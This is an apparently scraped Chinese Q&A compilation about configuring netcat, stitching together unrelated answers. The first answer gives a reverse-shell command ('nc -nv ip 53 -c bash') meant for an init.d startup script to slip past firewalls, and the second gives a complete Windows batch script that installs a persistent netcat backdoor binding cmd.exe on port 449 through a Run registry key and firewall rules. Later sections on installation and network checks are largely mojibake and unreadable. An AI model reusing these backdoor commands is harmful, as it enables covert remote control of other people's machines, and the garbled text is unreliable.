netcat如何配置
㈠ 為什麼CentOS或Redhat的netcat命令中沒有-e選項,如何才能使用此選項。不想重新編譯安裝。
我覺得,之所以沒有這個-e參數是為了防止被控方(centos)的操作人員設置後門,
你可以嘗試到etc/init.d下寫一個nc的啟動腳本,利用由內向外的反向鏈接-c參數反彈bash(可以越過防火牆)大概是「nc -nv ip地址 53 -c bash「
在攻擊方進行偵聽53DNS埠,等著魚兒上鉤吧!!
㈡ 如何在Windows,Linux中安裝後門
0×00 准備工作
假設用戶以管理員許可權登錄系統,在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 :)
為了便於你第一時間獲取到你的工具包,你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序,它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文顫塵件,方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件,並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ,不遺留下任何注冊表操作痕跡
3.操作痕跡最小化,盡量避免一切不必要的操作,導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服姿緩務並等待客戶端連接, 在客戶端連接成功之後,會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式,避免nc運行過程中,產生過多額外的日誌跡洞模信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表,增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則,開放監聽的449埠,允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則,允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
㈢ ubuntu16.04怎麼安裝netcat
etcat-0.7.1.tar.gz 然後當然是解壓了 tar zxvf netcat-0.7.1.tar.gz 解壓完畢之後會生成目錄,要cd進去 cd netcat-0.7.1 然後進行編譯前的配置。 ./configure 配置完了之後就可以make編譯了。 編譯成功就生成了netcat可執行的文件了,位於src目...
㈣ 濡備綍DOS涓嬪啓涓孌典唬鐮佸彂緇欏彟涓鍙扮數鑴戱紵
鍦―OS鎴朩indows鍛戒護琛屼笅錛屾偍鍙浠ヤ嬌鐢ㄤ互涓嬫柟娉曠紪鍐欎竴涓綆鍗曠殑鍛戒護鏉ュ皢鏂囨湰鏂囦歡鍙戦佸埌鍙︿竴鍙拌$畻鏈恆傝繖娑夊強浣跨敤`netcat`宸ュ叿錛屽畠鍙浠ョ敤浜庡湪緗戠粶涓婂彂閫佸拰鎺ユ敹鏁版嵁銆傝鋒敞鎰忥紝榪欓渶瑕佸湪鍙戦佸拰鎺ユ敹璁$畻鏈轟笂閮藉畨瑁卄netcat`銆
1. 鎵撳紑鍛戒護鎻愮ず絎︼紙DOS紿楀彛錛夈
2. 鍦ㄥ彂閫佽$畻鏈轟笂浣跨敤浠ヤ笅鍛戒護鍚鍔╜netcat`鏈嶅姟鍣錛岀洃鍚鎸囧畾鐨勭鍙c傚亣璁炬偍閫夋嫨絝鍙e彿涓12345錛
榪欏皢浣跨敤`netcat`灝哷myfile.txt`鏂囦歡鍙戦佸埌鎺ユ敹璁$畻鏈虹殑IP鍦板潃鍜岀鍙c
4. 鍥炲埌鎺ユ敹璁$畻鏈轟笂錛屾偍灝嗗湪鍚屼竴鐩褰曚腑鎵懼埌涓涓鍚嶄負`received.txt`鐨勬枃浠訛紝鍏朵腑鍖呭惈浠庡彂閫佽$畻鏈烘帴鏀剁殑鏁版嵁銆
璇鋒敞鎰忎互涓嬪嚑鐐癸細
- 璇風『淇濆湪鍙戦佸拰鎺ユ敹璁$畻鏈轟笂閮藉畨瑁呬簡`netcat`宸ュ叿銆
- 鎮ㄩ渶瑕佺煡閬撴帴鏀惰$畻鏈虹殑IP鍦板潃銆
- 鎮ㄥ彲浠ユ洿鏀規枃浠跺悕銆佺鍙e彿鍜屾枃浠惰礬寰勪互閫傚簲鎮ㄧ殑闇奼傘
榪欎釜紺轟緥鍋囪炬偍鍦ㄦ湰鍦扮綉緇滀腑榪涜屾枃浠朵紶杈撱傚傛灉娑夊強鍒頒簰鑱旂綉涓婄殑璁$畻鏈猴紝璇風『淇濇偍閲囧彇浜嗛傚綋鐨勭綉緇滃畨鍏ㄦ帾鏂斤紝鍥犱負`netcat`鍙鑳戒細瀵艱嚧娼滃湪鐨勫畨鍏ㄩ庨櫓銆傛ゅ栵紝濡傛灉闇瑕佸姞瀵嗕紶杈擄紝鎮ㄥ彲鑳介渶瑕佽冭檻浣跨敤鍏朵粬宸ュ叿錛屽係CP鎴朣ftp銆
㈤ 鍦坸閰嶇疆浜嗚妭鐐硅繕鏄鏃犳硶榪炴帴
鑺傜偣鐨勯厤緗鏈夎銆
紜淇濈綉緇滆繛鎺ヤ笂tcp鏄鍙浠ラ氱殑錛屽彲浠ラ忚繃netcat鍦ㄤ簩涓鑺傜偣鎵鍦ㄧ殑鏈哄櫒涓婂垎鍒寮涓鏈嶅姟銆
紜淇濈綉緇滆繛鎺ユ槸閫氱殑錛屽彲浠ラ忚繃ping鏉ユ煡鐪嬨傜『淇濈綉緇滆繛鎺ヤ笂tcp鏄鍙浠ラ氱殑錛屽彲浠ラ忚繃netcat鍦ㄤ簩涓鑺傜偣鎵鍦ㄧ殑鏈哄櫒涓婂垎鍒寮涓鏈嶅姟鍣ㄧ鍜屽㈡埛絝榪涜岄獙璇併傜『淇濈鍙f槸闃茬伀澧欏弸濂界殑銆俥rlang鐨勮妭鐐規槸鐧昏板湪epmd鏈嶅姟涓婄殑錛屾墍浠4369絝鍙h佽兘璁塊棶錛屽叾嬈¤妭鐐圭殑鍔ㄦ佺鍙f槸鍙浠ヨ塊棶鐨勩
㈥ netcat鍦ㄥ畨瑁卬map鏃跺氨浼氬畨瑁呭悧
cent os6.5鎬庝箞瀹夎卬map
濡傛灉鏄鍥懼艦鐣岄潰錛屽彲浠ョ偣鍑誨惎鍔ㄧ粓絝銆 涓嶈繃錛 榪欏湪浼佷笟涓涓嶉傜敤錛岄兘鏄浣跨敤鐨勮繙紼嬭蔣浠剁淮鎶ょ殑銆 濡傛灉妤間富浠ュ悗鏈塋inux緋葷粺綆$悊錛宭inux緋葷粺寤鴻撅紝 姣斿俛pache錛 dns錛 vsftp錛宻hell緙栫▼闂棰橈紝鎴栬呮槸鏈塸ython鐨勫紑鍙戦渶奼傦紝緗戦〉鐨勶紝閮借屻
1銆佸湪瀹夎呯郴緇熸椂錛岄夋嫨涓鏂囦粎瀵瑰畨瑁呮湁鏁堬紝鍗寵╀綘鍦ㄥ畨瑁呰繃紼嬫樉紺虹殑淇℃伅鏄涓鏂囥傚湪鍚庨潰鐨勫畾鍒舵湇鍔¢偅鍧楋紝鍙浠ラ夋嫨鏀鎸佷腑鏂囷紝涓鑸榛樿ゆ敮鎸佷腑鏂囩殑~~
2銆佸傛灉娌℃湁涓鏂囨敮鎸佷綘鍙宸插畨瑁
# yum grouplist #鏌ョ湅Installed Language Groups: 涓嬫槸鍚︽湁Chinese support錛屽傛灉娌℃湁錛屽彲浠ュ畨瑁匔hinese support
#yum -y groupinstall Chinese support #鍓嶆彁鏄浣犻渶瑕佹惌寤哄ソyum
3銆佺郴緇熸敼涓轟腑鏂囨敮鎸
#LANG=zh_CN.UTF-8 #涓存椂鐢熸晥
淇鏀/etc/sysconfig/i18n 錛屾案涔呯敓鏁
# vim /etc/sysconfig/i18n
LANG="zh_CN.UTF-8"
榪欎釜闇瑕佷綘閲嶅惎鍚庨厤緗鎵嶇敓鏁